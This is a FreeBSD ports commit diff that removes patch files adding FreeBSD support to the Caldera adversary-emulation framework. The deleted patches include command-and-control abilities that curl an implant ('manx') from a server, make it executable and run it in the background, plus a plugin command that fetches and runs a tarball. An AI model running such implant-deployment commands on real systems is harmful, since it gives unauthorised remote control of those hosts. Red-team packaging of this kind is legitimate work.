-@@ -13,7 +13,7 @@ from app.utility.base_world import BaseWorld - from app.utility.base_service import BaseService - from app.objects.c_agent import Agent - --PLATFORMS = dict(windows='windows', macos='darwin', linux='linux') -+PLATFORMS = dict(windows='windows', macos='darwin', linux='linux', freebsd='freebsd') - EXECUTORS = dict(command_prompt='cmd', sh='sh', powershell='psh', bash='sh') - RE_VARIABLE = re.compile('(#{(.*?)})', re.DOTALL) - PREFIX_HASH_LEN = 6 -@@ -45,7 +45,7 @@ class AtomicService(BaseService): - the `repo_url` parameter (eg. if you want to use a fork). - """ - if not repo_url: -- repo_url = 'https://github.com/redcanaryco/atomic-red-team.git' -+ repo_url = 'https://github.com/alonsobsd/atomic-red-team.git' - - if not os.path.exists(self.repo_dir) or not os.listdir(self.repo_dir): - self.log.debug('cloning repo %s' % repo_url) diff --git a/security/caldera4/files/patch-plugins_emu_app_emu__svc.py b/security/caldera4/files/patch-plugins_emu_app_emu__svc.py deleted file mode 100644 index 735212716c22..000000000000 --- a/security/caldera4/files/patch-plugins_emu_app_emu__svc.py +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/emu/app/emu_svc.py.orig 2022-06-12 20:12:01 UTC -+++ plugins/emu/app/emu_svc.py -@@ -12,7 +12,7 @@ - - - class EmuService(BaseService): -- _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows'} -+ _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows', 'sandcat.go-freebsd'} - _emu_config_path = "conf/default.yml" - - def __init__(self): diff --git a/security/caldera4/files/patch-plugins_gameboard_app_gameboard__api.py b/security/caldera4/files/patch-plugins_gameboard_app_gameboard__api.py deleted file mode 100644 index 7121866698a1..000000000000 --- a/security/caldera4/files/patch-plugins_gameboard_app_gameboard__api.py +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/gameboard/app/gameboard_api.py.orig 2021-12-22 15:33:52 UTC -+++ plugins/gameboard/app/gameboard_api.py -@@ -244,7 +244,7 @@ class GameboardApi(BaseService): - reference_ability = (await self.data_svc.locate('abilities', match=dict(ability_id='bf565e6a-0037-4aa4-852f-1afa222c76db')))[0] #TODO: replace - ability_id = str(uuid.uuid4()) - executors = [] -- for pl in ['windows', 'darwin', 'linux']: -+ for pl in ['windows', 'darwin', 'linux', 'freebsd']: - reference_executor = reference_ability.find_executor('elasticsearch', pl) - if not reference_executor: - continue diff --git a/security/caldera4/files/patch-plugins_human_templates_human.html b/security/caldera4/files/patch-plugins_human_templates_human.html deleted file mode 100644 index 9bc604e58123..000000000000 --- a/security/caldera4/files/patch-plugins_human_templates_human.html +++ /dev/null @@ -1,40 +0,0 @@ ---- plugins/human/templates/human.html.orig 2022-09-06 17:33:12 UTC -+++ plugins/human/templates/human.html -@@ -60,6 +60,7 @@ - -@@ -257,6 +258,11 @@ - ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + - '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; - break; -+ case "freebsd": -+ baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + -+ ' && virtualenv -p python3.9 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + -+ '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; -+ break; - case "linux": - baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + - ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + -@@ -293,6 +299,10 @@ - $.each(extra, function(i, command) { - switch (platform) { - case "darwin": -+ command = command.replace(/\\/g, '\\\\'); -+ command = command.replace(/"/g, '\\\"'); -+ break; -+ case "freebsd": - command = command.replace(/\\/g, '\\\\'); - command = command.replace(/"/g, '\\\"'); - break; -@@ -317,4 +327,4 @@ - return provided_value || default_value; - } - -- -\ No newline at end of file -+ diff --git a/security/caldera4/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml b/security/caldera4/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml deleted file mode 100644 index a641bf2abe45..000000000000 --- a/security/caldera4/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml +++ /dev/null @@ -1,33 +0,0 @@ ---- plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml.orig 2022-08-08 23:34:48 UTC -+++ plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml -@@ -57,6 +57,30 @@ - contact="tcp"; - agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; - nohup ./$agent -http $server -socket $socket -contact $contact & -+ freebsd: -+ sh: -+ command: | -+ server="#{app.contact.http}"; -+ socket="#{app.contact.tcp}"; -+ contact="tcp"; -+ curl -s -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name}; -+ chmod +x #{agents.implant_name}; -+ ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v -+ variations: -+ - description: Run against the UDP contact -+ command: | -+ server="#{app.contact.http}"; -+ socket="#{app.contact.udp}"; -+ contact="udp"; -+ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; -+ nohup ./$agent -http $server -socket $socket -contact $contact & -+ - description: Download with a random name and start as a background process -+ command: | -+ server="#{app.contact.http}"; -+ socket="#{app.contact.tcp}"; -+ contact="tcp"; -+ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; -+ nohup ./$agent -http $server -socket $socket -contact $contact & - windows: - psh: - command: | diff --git a/security/caldera4/files/patch-plugins_manx_update-shells.sh b/security/caldera4/files/patch-plugins_manx_update-shells.sh deleted file mode 100644 index 97280531ab7d..000000000000 --- a/security/caldera4/files/patch-plugins_manx_update-shells.sh +++ /dev/null @@ -1,12 +0,0 @@ ---- plugins/manx/update-shells.sh.orig 2022-08-08 23:34:48 UTC -+++ plugins/manx/update-shells.sh -@@ -1,7 +1,8 @@ --#!/bin/bash -+#!/bin/sh - cwd=$(pwd) - cd shells - GOOS=windows go build -o ../payloads/manx.go-windows -ldflags="-s -w" manx.go - GOOS=linux go build -o ../payloads/manx.go-linux -ldflags="-s -w" manx.go - GOOS=darwin go build -o ../payloads/manx.go-darwin -ldflags="-s -w" manx.go -+GOOS=freebsd go build -o ../payloads/manx.go-freebsd -ldflags="-s -w" manx.go - cd $cwd diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml b/security/caldera4/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml deleted file mode 100644 index 4df13e956c00..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml +++ /dev/null @@ -1,15 +0,0 @@ ---- plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml -@@ -24,3 +24,12 @@ - python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 - cleanup: | - pkill -f elasticat -+ freebsd: -+ sh: -+ command: | -+ server="#{app.contact.http}"; -+ curl -s -X POST -H "file:elasticat.py" -H "platform:freebsd" $server/file/download > elasticat.py; -+ pip install requests; -+ python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 -+ cleanup: | -+ pkill -f elasticat diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml deleted file mode 100644 index e34453b7e11c..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml -@@ -9,7 +9,7 @@ - name: x - repeatable: True - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - find /var/mail -type f -exec grep "From.*@.*\..*" {} \; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml deleted file mode 100644 index 2962be97e40c..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml -@@ -17,7 +17,7 @@ - - source: remote.port.unauthorized - edge: has_pid - target: host.pid.unauthorized -- linux: -+ freebsd,linux: - sh: - command: | - ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}' -@@ -34,4 +34,4 @@ - plugins.response.app.parsers.process: - - source: remote.port.unauthorized - edge: has_pid -- target: host.pid.unauthorized -\ No newline at end of file -+ target: host.pid.unauthorized diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml deleted file mode 100644 index 5c45a62b261e..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: True - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - filepath="#{file.sensitive.path}"; -@@ -46,4 +46,4 @@ - edge: has_hash - target: file.sensitive.hash - - plugins.stockpile.app.requirements.paw_provenance: -- - source: file.sensitive.hash -\ No newline at end of file -+ - source: file.sensitive.hash diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml deleted file mode 100644 index bb5c268f119d..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: True - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - directory="#{directory.sensitive.path}"; -@@ -68,4 +68,4 @@ - edge: has_hash - target: directory.sensitive.hash - - plugins.stockpile.app.requirements.paw_provenance: -- - source: directory.sensitive.hash -\ No newline at end of file -+ - source: directory.sensitive.hash diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml deleted file mode 100644 index 04e09ebbabbd..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml -@@ -8,7 +8,7 @@ - name: x - repeatable: True - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - set -f; diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml b/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml deleted file mode 100644 index 9c0b12919fb9..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml -@@ -28,7 +28,7 @@ - - source: host.process.guid - edge: has_interesting - target: investigate.process.guid -- linux: -+ freebsd,linux: - elasticsearch: - *cmd - darwin: diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml b/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml deleted file mode 100644 index 1fa277437813..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml -@@ -25,7 +25,7 @@ - - source: host.process.guid - edge: has_interesting - target: investigate.process.parent_guid -- linux: -+ freebsd,linux: - elasticsearch: - *cmd - darwin: diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml b/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml deleted file mode 100644 index 2879ff2bff30..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml -@@ -22,7 +22,7 @@ - - source: host.process.guid - edge: has_interesting - target: investigate.process.guid -- linux: -+ freebsd,linux: - elasticsearch: - *cmd - darwin: diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml deleted file mode 100644 index 85edefaa30f9..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml -@@ -8,7 +8,7 @@ - attack_id: x - name: x - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - kill -9 #{host.pid.unauthorized} -@@ -25,4 +25,4 @@ - taskkill /pid #{host.pid.unauthorized} /f - requirements: - - plugins.stockpile.app.requirements.paw_provenance: -- - source: host.pid.unauthorized -\ No newline at end of file -+ - source: host.pid.unauthorized diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml deleted file mode 100644 index e28abe22f8d4..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml -@@ -7,7 +7,7 @@ - attack_id: x - name: x - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi; -@@ -27,4 +27,4 @@ - if (-not (Test-Path -Path .\hosts_backup)) { Copy-Item -Path c:\windows\system32\drivers\etc\hosts -Destination .\hosts_backup; }; - Add-Content c:\windows\system32\drivers\etc\hosts "127.0.0.1`t#{remote.suspicious.url}"; - cleanup: | -- Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force -\ No newline at end of file -+ Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml deleted file mode 100644 index 26f61e8f83cd..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml -@@ -7,7 +7,7 @@ - attack_id: x - name: x - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - crontab -u #{host.user.name} -l > temp_crontab; -@@ -35,4 +35,4 @@ - edge: has_new_cronjob - target: host.new.cronjob - - plugins.stockpile.app.requirements.paw_provenance: -- - source: host.new.cronjob -\ No newline at end of file -+ - source: host.new.cronjob diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml deleted file mode 100644 index 72c7f5fec0b7..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - directory="#{directory.sensitive.path}"; -@@ -40,4 +40,4 @@ - - plugins.stockpile.app.requirements.paw_provenance: - - source: directory.sensitive.backup - - plugins.stockpile.app.requirements.paw_provenance: -- - source: directory.sensitive.path -\ No newline at end of file -+ - source: directory.sensitive.path diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml deleted file mode 100644 index f87d3e750316..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path} -@@ -31,4 +31,4 @@ - - plugins.stockpile.app.requirements.paw_provenance: - - source: file.backup.name - - plugins.stockpile.app.requirements.paw_provenance: -- - source: file.sensitive.path -\ No newline at end of file -+ - source: file.sensitive.path diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml b/security/caldera4/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml deleted file mode 100644 index fb7e82cf61c0..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - mkdir -p /tmp/sensitive_file_backups; diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml b/security/caldera4/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml deleted file mode 100644 index fa5a362e9b9e..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - output=""; -@@ -87,4 +87,4 @@ - } - requirements: - - plugins.response.app.requirements.source_fact: -- - source: directory.sensitive.path -\ No newline at end of file -+ - source: directory.sensitive.path diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml b/security/caldera4/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml deleted file mode 100644 index 966f5dfa6125..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - mkdir -p /tmp/sensitive_file_backups; -@@ -67,4 +67,4 @@ - Remove-Item -Recurse -Force C:\Users\Public\sensitive_file_backups; - requirements: - - plugins.response.app.requirements.source_fact: -- - source: file.sensitive.path -\ No newline at end of file -+ - source: file.sensitive.path diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml b/security/caldera4/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml deleted file mode 100644 index fac4b766aaa3..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: *** 3014 LINES SKIPPED ***